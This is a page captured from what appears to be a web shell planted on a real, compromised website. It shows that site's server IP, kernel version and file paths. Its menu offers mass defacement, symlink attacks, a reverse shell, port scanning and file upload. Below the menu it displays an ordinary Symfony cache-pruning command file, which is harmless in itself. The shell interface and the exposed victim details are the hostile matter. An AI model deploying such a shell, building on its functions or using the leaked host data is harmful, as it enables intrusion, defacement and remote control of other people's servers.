ヤミRoot VoidGate
User / IP
:
216.73.216.143
Host / Server
:
146.88.233.70 / dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
logercm
/
dev.loger.cm
/
vendor
/
symfony
/
framework-bundle
/
Command
/
Viewing: CachePoolPruneCommand.php
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Bundle\FrameworkBundle\Command; use Symfony\Component\Cache\PruneableInterface; use Symfony\Component\Console\Command\Command; use Symfony\Component\Console\Input\InputInterface; use Symfony\Component\Console\Output\OutputInterface; use Symfony\Component\Console\Style\SymfonyStyle; /** * Cache pool pruner command. * * @author Rob Frawley 2nd <rmf@src.run> */ final class CachePoolPruneCommand extends Command { protected static $defaultName = 'cache:pool:prune'; protected static $defaultDescription = 'Prune cache pools'; private $pools; /** * @param iterable<mixed, PruneableInterface> $pools */ public function __construct(iterable $pools) { parent::__construct(); $this->pools = $pools; } /** * {@inheritdoc} */ protected function configure() { $this ->setDescription(self::$defaultDescription) ->setHelp(<<<'EOF' The <info>%command.name%</info> command deletes all expired items from all pruneable pools. %command.full_name% EOF ) ; } /** * {@inheritdoc} */ protected function execute(InputInterface $input, OutputInterface $output): int { $io = new SymfonyStyle($input, $output); foreach ($this->pools as $name => $pool) { $io->comment(sprintf('Pruning cache pool: <info>%s</info>', $name)); $pool->prune(); } $io->success('Successfully pruned cache pool(s).'); return 0; } }
Coded With 💗 by
0x6ick